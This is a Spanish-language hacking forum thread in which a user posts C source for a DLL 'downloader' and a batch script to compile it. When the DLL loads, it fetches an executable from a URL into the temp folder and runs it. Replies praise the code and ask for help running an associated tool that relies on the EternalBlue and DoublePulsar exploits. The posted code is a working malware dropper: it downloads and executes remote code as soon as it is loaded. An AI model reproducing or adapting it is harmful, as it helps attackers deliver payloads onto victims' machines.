Te quedo de lujo Blau, todo un master!
Hola, soy nuevo aquí y me gustaría ponerme en contacto contigo.Blau escribió: 16 May 2017, 20:38 A petición de un compañero por el grupo de Skype, os dejo el código para un downloader DLL en C. Debéis instalar [Enlace externo eliminado para invitados] (o cualquier compilador basado en MinGW).
Downloader.cPara compilar normalmente me hago un archivo .bat con esta estructura:#include <windows.h> BOOL __cdecl __declspec(dllexport) Download() { char* szUrl = "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe"; char* szPath = "aaaaa.exe"; char *szTempPath = malloc(256); DWORD dwPathLength = GetTempPathA(256, szTempPath); strncat(szTempPath, szPath, dwPathLength); szTempPath[dwPathLength + strlen(szPath) + 1] = 0; HRESULT hRes = URLDownloadToFileA(NULL, szUrl, szTempPath, 0, NULL); if(hRes == S_OK) { ShellExecuteA(NULL, "open", szTempPath, NULL, NULL, SW_SHOW); } return TRUE; } BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if(fdwReason != DLL_PROCESS_ATTACH) return TRUE; return Download(); }
@ECHO OFF SET InputFile=Downloader SET Parameters=-w -Os -s -fpermissive -shared -lurlmon del %InputFile%32.dll gcc %InputFile%.c %Parameters% -m32 -o %InputFile%32.dll del %InputFile%64.dll gcc %InputFile%.c %Parameters% -m64 -o %InputFile%64.dll
Blau eres un genio, un guru.
thaaaaaaaaaaaaaanks
Añadido código fuente en el post principal.
Paylload DummyDLL64.dll
Gracias por ejemplo.
Muchisimas gracias crack
Lo ejecuto en Kali con MONO pero a la hora de dar en "start" me lanza un error que dice que no se encuentra el archivo doublepulsar ni eternalblue... ya revise el codigo fuente y hace la referencia correcta a la carpeta bin ... no encuentro el problema, alguien puede ayudarme???
No lo he probado en Linux pero supongo que habria que modificar el código para correr los ejecutables bajo wine.
thansk for share
De casualidad alguien lo tendra que pueda pasarmelo, por favor? Gracias.
El código fuente esta en la primer pagina!
El link de mega que subió Blau esta muertolcno: escribió: El código fuente esta en la primer pagina!